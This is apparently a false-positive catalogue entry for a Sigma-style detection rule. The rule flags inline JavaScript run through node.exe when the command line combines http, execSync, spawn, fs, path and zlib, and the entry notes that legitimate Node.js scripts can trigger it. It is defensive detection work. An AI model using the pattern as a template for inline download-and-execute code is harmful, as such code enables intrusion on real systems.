LoFP LoFP / legitimate scripts using node.js with these modules

Techniques

Sample rules

Potentially Suspicious Inline JavaScript Execution via NodeJS Binary

Description

Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.

Detection logic

condition: all of selection_*
selection_cmd:
  CommandLine|contains|all:
  - http
  - execSync
  - spawn
  - fs
  - path
  - zlib
selection_img:
- Image|endswith: \node.exe
- OriginalFileName: node.exe
- Product: Node.js